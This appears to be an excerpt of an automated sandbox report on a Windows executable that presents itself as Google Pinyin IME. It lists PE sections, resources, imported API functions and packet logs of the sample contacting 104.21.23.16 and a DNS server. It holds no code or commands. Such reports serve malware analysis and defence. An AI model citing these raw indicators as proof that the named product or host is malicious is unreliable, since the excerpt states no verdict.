Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11fc1e	0x11fe00	False	0.463952419399	data	6.5610538952	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x121000	0x37978	0x37a00	False	0.340704002809	data	5.10261528062	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x159000	0x812c	0x5600	False	0.271666061047	data	4.93291112706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x162000	0xf918	0xfa00	False	0.420390625	data	5.32227888562	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x172000	0x1d332	0x1d400	False	0.00116018963675	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x162888	0xea8	data	Chinese	China
RT_ICON	0x163730	0x8a8	data	Chinese	China
RT_ICON	0x163fd8	0x568	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x164540	0x25a8	data	Chinese	China
RT_ICON	0x166ae8	0x10a8	data	Chinese	China
RT_ICON	0x167b90	0x468	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x167ff8	0x368	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x168360	0xca8	data	Chinese	China
RT_ICON	0x169008	0x1ca8	data	Chinese	China
RT_ICON	0x16ad38	0x668	data	Chinese	China
RT_ICON	0x16b3a0	0x2e8	data	Chinese	China
RT_ICON	0x16b688	0x128	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x16b7b0	0xea8	data	Chinese	China
RT_ICON	0x16c658	0x8a8	data	Chinese	China
RT_ICON	0x16cf00	0x568	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x16d468	0x25a8	dBase III DBT, version number 0, next free block index 40	Chinese	China
RT_ICON	0x16fa10	0x10a8	data	Chinese	China
RT_ICON	0x170ab8	0x468	GLS_BINARY_LSB_FIRST	Chinese	China
RT_DIALOG	0x1625b0	0x24c	data	Chinese	China
RT_DIALOG	0x162800	0x86	data	Chinese	China
RT_STRING	0x1715c8	0xc6	data	Chinese	China
RT_STRING	0x171690	0x1ba	data	Chinese	China
RT_STRING	0x171850	0xc2	data	Chinese	China
RT_GROUP_ICON	0x16acb0	0x84	data	Chinese	China
RT_GROUP_ICON	0x170f20	0x84	data	Chinese	China
RT_VERSION	0x170fa8	0x2a0	data	Chinese	China
RT_MANIFEST	0x171248	0x37c	XML 1.0 document, ASCII text	Chinese	China

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegQueryValueExW, RegQueryInfoKeyW, RegDeleteKeyW, RegDeleteValueW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey, RegSetValueExW, GetSidSubAuthority, GetSidSubAuthorityCount, CryptGetHashParam, RegEnumValueW, LookupAccountNameW, CryptHashData, CryptDestroyHash, CryptDestroyKey, CryptCreateHash, CryptImportKey, CryptReleaseContext, CryptVerifySignatureW, CryptAcquireContextW, SetSecurityDescriptorDacl, SetEntriesInAclW, InitializeSecurityDescriptor, CreateWellKnownSid, CopySid, GetLengthSid, ConvertSidToStringSidW, GetSecurityInfo, DuplicateTokenEx, DuplicateToken, CreateRestrictedToken, ConvertStringSidToSidW, SetTokenInformation, CreateProcessAsUserW, SetThreadToken, LookupPrivilegeValueW, RegFlushKey, EqualSid, GetTokenInformation, OpenProcessToken, FreeSid, CheckTokenMembership, AllocateAndInitializeSid, SetSecurityInfo, GetSecurityDescriptorSacl, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegOpenCurrentUser, GetUserNameW
KERNEL32.dll	Process32FirstW, AssignProcessToJobObject, GetThreadContext, CreateToolhelp32Snapshot, DuplicateHandle, WriteProcessMemory, ResumeThread, SetInformationJobObject, CreateJobObjectW, GetFileSizeEx, FileTimeToLocalFileTime, GetDriveTypeW, FindFirstFileExW, GetFileInformationByHandle, PeekNamedPipe, FreeResource, VerSetConditionMask, VerifyVersionInfoW, GetVolumeInformationW, GetComputerNameW, Process32NextW, OpenMutexW, CreateProcessW, WaitForSingleObject, GetTickCount, InitializeCriticalSection, WideCharToMultiByte, TerminateProcess, GetModuleFileNameA, IsDebuggerPresent, OutputDebugStringA, ReleaseMutex, GetCurrentProcessId, DebugBreak, GetTempPathA, LocalFree, VirtualQuery, GetCurrentThread, GetSystemTime, CreateSemaphoreW, LoadLibraryW, TerminateThread, ReleaseSemaphore, CreateFileW, WriteFile, ResetEvent, SetEvent, WaitForMultipleObjects, GetSystemDirectoryW, FindFirstFileW, FindNextFileW, GetFullPathNameW, GetShortPathNameW, DeleteFileW, RemoveDirectoryW, LockResource, FindResourceExW, FindClose, GetVersionExW, GetNativeSystemInfo, OpenFileMappingW, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, OpenEventW, HeapFree, GetProcessHeap, HeapAlloc, MoveFileExW, GetSystemWow64DirectoryW, OpenProcess, CopyFileW, SetFileAttributesW, FlushViewOfFile, CreateDirectoryW, GetFileSize, MulDiv, CreateTimerQueueTimer, DeleteTimerQueueTimer, GetTempFileNameW, GetTempPathW, ConnectNamedPipe, CreateNamedPipeW, ReadFile, CreateEventW, Sleep, GetSystemDefaultLangID, GetLocaleInfoW, CompareStringW, FlushInstructionCache, SetLastError, lstrcpyW, SetFilePointer, SetEndOfFile, GetStartupInfoW, GetCurrentDirectoryW, MoveFileW, SetCurrentDirectoryW, SystemTimeToFileTime, FileTimeToSystemTime, GetFileAttributesW, LocalFileTimeToFileTime, SetFileTime, HeapDestroy, HeapReAlloc, HeapSize, InterlockedCompareExchange, InterlockedPushEntrySList, IsProcessorFeaturePresent, VirtualFree, VirtualAlloc, InterlockedPopEntrySList, InterlockedExchange, EncodePointer, DecodePointer, UnhandledExceptionFilter, GetCommandLineW, HeapSetInformation, GetSystemTimeAsFileTime, ExitProcess, RtlUnwind, GetCPInfo, LCMapStringW, HeapCreate, GetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, QueryPerformanceCounter, GetACP, GetOEMCP, IsValidCodePage, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetTimeZoneInformation, GetStringTypeW, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleW, SetStdHandle, CreateFileA, SetEnvironmentVariableA, VirtualUnlock, VirtualLock, GetProcessWorkingSetSize, CreateThread, CloseHandle, GetCurrentThreadId, DeleteCriticalSection, lstrcmpiW, SetProcessWorkingSetSize, EnterCriticalSection, GetProcAddress, GetLastError, RaiseException, lstrlenW, MultiByteToWideChar, GetModuleFileNameW, LeaveCriticalSection, SizeofResource, InitializeCriticalSectionAndSpinCount, GetModuleHandleW, GetCurrentProcess, InterlockedDecrement, InterlockedIncrement, LoadLibraryExW, LoadResource, FreeLibrary, FindResourceW, SetPriorityClass, CreateMutexW, SetUnhandledExceptionFilter
USER32.dll	FillRect, GetWindowRect, ScreenToClient, SetCursor, EndPaint, UnregisterClassA, DispatchMessageW, DefWindowProcW, MessageBoxW, LoadStringW, PeekMessageW, TranslateMessage, CharNextW, GetMessageW, DestroyWindow, SetCapture, DrawTextW, GetFocus, DialogBoxParamW, TrackMouseEvent, LoadCursorW, MessageBeep, IsWindowEnabled, GetClientRect, SetFocus, SetRectEmpty, BeginPaint, PtInRect, GetDC, IsWindow, GetCapture, DrawFocusRect, OffsetRect, InvalidateRect, GetClassNameW, ReleaseDC, MonitorFromWindow, GetDlgItem, EndDialog, GetSysColor, SetWindowPos, GetCursorPos, CheckDlgButton, ShowWindow, IsDlgButtonChecked, GetActiveWindow, ReleaseCapture, SetDlgItemTextW, SendMessageW, MapWindowPoints, UpdateWindow, EnableWindow, GetDlgCtrlID, SetWindowTextW, GetMonitorInfoW, CallWindowProcW, GetWindow, LoadIconW, GetWindowLongW, SetWindowLongW, GetWindowTextW, GetWindowTextLengthW, CreateWindowExW, RegisterClassW, GetParent, wvsprintfW
VERSION.dll	VerQueryValueW
ole32.dll	CoCreateInstance, CoUninitialize, CoTaskMemRealloc, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromGUID2, CoCreateGuid
OLEAUT32.dll	SafeArrayUnlock, VariantInit, VarUI4FromStr, SysFreeString, SysAllocString, VariantClear, SafeArrayGetLBound, SafeArrayDestroy, SafeArrayCreate, SafeArrayRedim, SafeArrayLock, SafeArrayGetVartype, SafeArrayGetUBound, SafeArrayCopy
COMCTL32.dll	InitCommonControlsEx
GDI32.dll	SetTextColor, CreateFontIndirectW, SetBkMode, DeleteObject, SelectObject, GetObjectW, GetStockObject
dbghelp.dll	SymFunctionTableAccess64, SymGetModuleBase64, StackWalk64
SETUPAPI.dll	SetupInitDefaultQueueCallback, SetupIterateCabinetW, SetupDefaultQueueCallbackW, SetupTermDefaultQueueCallback
WINTRUST.dll	WinVerifyTrust
CRYPT32.dll	CertCloseStore, CertFreeCertificateContext, CryptQueryObject, CertEnumCertificatesInStore, CryptDecodeObject, CryptProtectData, CryptUnprotectData, CertDuplicateCertificateContext, CertNameToStrW
PSAPI.DLL	GetModuleFileNameExW
SHELL32.dll	CommandLineToArgvW, Shell_NotifyIconW, SHGetSpecialFolderPathW, SHCreateDirectoryExW, SHGetFolderPathW, ShellExecuteExW, SHFileOperationW, ShellExecuteW
SHLWAPI.dll	PathRemoveFileSpecW, PathFindExtensionW, PathAddExtensionW, UrlEscapeW, PathFindFileNameW, PathRemoveExtensionW, PathFileExistsW, PathCommonPrefixW, PathRemoveBackslashW, PathCombineW, PathAppendW, PathStripPathW, PathIsDirectoryW, PathIsRelativeW, PathCanonicalizeW
urlmon.dll	URLDownloadToFileW
WININET.dll	HttpOpenRequestW, InternetCloseHandle, DeleteUrlCacheEntryW, InternetCrackUrlW, InternetOpenW, InternetReadFile, InternetConnectW, HttpSendRequestW, HttpQueryInfoW, InternetQueryDataAvailable
IPHLPAPI.DLL	GetAdaptersInfo

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2008
InternalName	Google Pinyin
FileVersion	2.7.25.128
CompanyName	Google Inc.
ProductName	Google Pinyin IME
ProductVersion	2.7.25.128
FileDescription	Google Pinyin IME
Translation	0x0804 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 29, 2021 17:38:38.629965067 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.678442955 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.678564072 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.678960085 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.679003000 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.725050926 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.725073099 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736063004 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736099958 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736125946 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736150026 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736166000 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736212015 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.736237049 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.746789932 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.746871948 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.793273926 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.793298960 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798671007 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798837900 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798856020 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798871040 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798882008 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798902988 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.798929930 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.929573059 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.929651022 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.976480961 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.976506948 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.990947008 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.990974903 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.991063118 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.991370916 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.991396904 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.991452932 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.992382050 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:39.073061943 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.105988979 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.106060028 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.152085066 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.157530069 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.157551050 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.157649040 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.157977104 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.157994032 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.158044100 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.158929110 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.276395082 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.534598112 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.580199957 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.580327034 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.580929995 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.580970049 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.626388073 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.626430035 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659503937 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659538031 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659560919 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659573078 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659586906 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659627914 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.659672976 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.740354061 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.786232948 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.786313057 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.794128895 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.794214964 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.840146065 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.840168953 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865298986 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865328074 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865345955 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865360975 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865372896 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865417004 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.865438938 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:50.929253101 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:50.929301977 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:50.975228071 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.975272894 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982594967 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982636929 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982666969 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982681036 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:50.982695103 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982716084 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982732058 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:51.037255049 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:51.175381899 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:56.520461082 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.523209095 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.523325920 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.568842888 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.568869114 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578520060 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578546047 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578562975 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578577995 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578589916 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578664064 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.578723907 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.634712934 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.634824038 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.680406094 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.680428982 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.693810940 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.693840027 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.693938971 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.694220066 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.694535971 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.694607019 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.695199013 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.777723074 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.145667076 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.145747900 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.191931009 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.201672077 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.201694965 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.201782942 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.202131033 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.202184916 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.202238083 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.202939987 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.209351063 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.209429026 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.258761883 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.264574051 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.264621019 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.264731884 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.265001059 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.265031099 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.265086889 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.265280008 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.266551018 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.319027901 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.319055080 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.319071054 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.319132090 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.319205999 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.319264889 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:58.320005894 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:58.465327024 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:15.366708040 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:15.366833925 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:15.638581038 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:15.951106071 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:16.560844898 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:17.779493093 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:17.868413925 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:17.868499041 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:17.915712118 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:17.942154884 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:17.942183971 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:17.942315102 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:17.942575932 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:17.942600012 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:17.942687035 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:17.943510056 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:17.998136044 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:24.057656050 CET	49730	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:24.104093075 CET	80	49730	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:24.105513096 CET	49730	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:24.107032061 CET	49730	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:24.156493902 CET	80	49730	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:24.218722105 CET	80	49730	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:24.218751907 CET	80	49730	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:24.218769073 CET	80	49730	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:24.218785048 CET	80	49730	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:24.218796015 CET	80	49730	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:24.218864918 CET	49730	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:24.218918085 CET	49730	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:24.219105959 CET	49730	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:24.266268015 CET	80	49730	104.21.23.16	192.168.2.5
Jan 29, 2021 17:39:24.266556978 CET	49730	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:39:30.668939114 CET	49720	80	192.168.2.5	104.21.23.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 29, 2021 17:38:27.302711964 CET	54795	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:27.352559090 CET	53	54795	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:28.275805950 CET	49557	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:28.326750994 CET	53	49557	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:29.316663980 CET	61733	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:29.364526987 CET	53	61733	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:30.362878084 CET	65447	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:30.413861036 CET	53	65447	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:31.698425055 CET	52441	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:31.756263018 CET	53	52441	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:31.938312054 CET	62176	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:31.995935917 CET	53	62176	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:33.800276041 CET	59596	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:33.848179102 CET	53	59596	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:35.741360903 CET	65296	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:35.792155027 CET	53	65296	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:37.242661953 CET	63183	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:37.290729046 CET	53	63183	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:38.545653105 CET	60151	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:38.608894110 CET	53	60151	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:39.016016006 CET	56969	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:39.066718102 CET	53	56969	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:46.470663071 CET	55161	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:46.521174908 CET	53	55161	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:48.390662909 CET	54757	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:48.447154045 CET	53	54757	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:48.941138983 CET	49992	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:49.004883051 CET	53	49992	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:07.998764992 CET	60075	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:08.047472000 CET	53	60075	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:17.272034883 CET	55016	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:17.330410004 CET	53	55016	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:17.341788054 CET	64345	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:17.389991999 CET	53	64345	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:19.839441061 CET	57128	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:19.890294075 CET	53	57128	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:23.981044054 CET	54791	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:24.040030956 CET	53	54791	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:31.853482008 CET	50463	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:31.916234970 CET	53	50463	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:48.442440033 CET	50394	53	192.168.2.5	8.8.8.8
